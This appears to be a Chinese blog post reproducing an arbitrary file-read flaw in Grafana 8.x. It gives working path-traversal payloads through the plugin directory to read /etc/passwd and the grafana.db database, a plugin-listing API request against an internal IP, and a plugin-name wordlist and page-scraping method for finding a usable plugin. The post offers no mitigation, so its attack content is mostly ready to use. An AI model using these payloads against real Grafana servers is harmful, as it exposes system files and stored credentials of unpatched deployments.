Grafana 任意文件读取漏洞复现

一、漏洞描述

Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件

二、漏洞影响

Grafana 8.x

三、漏洞复现

可以从登陆页面看到版本信息为 v8.2.4,此版本在漏洞射程范围之内

查看当前所使用的插件:

/api/plugins?embedded=0
http://10.10.12.120:443/api/plugins?embedded=0

读取 /etc/passwd文件

POC: /public/plugins/welcome/../../../../../../../../../etc/passwd

读取 db 文件

POC: /public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db

 

四、探测插件

因为环境的不同可能存在的插件也就不同

4.1 字典爆破

可以直接去官网爬取字典:https://grafana.com/grafana/plugins/

一些比较热门的插件字典

alertmanager
grafana
loki
postgres
grafana-azure-monitor-datasource
mixed
prometheus
cloudwatch
graphite
mssql
tempo
dashboard
influxdb
mysql
testdata
elasticsearch
jaeger
opentsdb
zipkin
alertGroups
bargauge
debug
graph
live
piechart
status-history
timeseries
alertlist
candlestick
gauge
heatmap
logs
pluginlist
table
welcome
annolist
canvas
geomap
histogram
news
stat
table-old
xychart
barchart
dashlist
gettingstarted
icon
nodeGraph
state-timeline
text

4.2 页面抓取

查看网站登陆页面源代码,匹配关键字 public/app/plugins/panel/

猜测关键字后面的为插件名称,我们找个除了 welcome 这个插件的另外一个插件来测试

 

然后拼接 payload 为

/public/plugins/alertlist/../../../../../../../../../etc/passwd

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值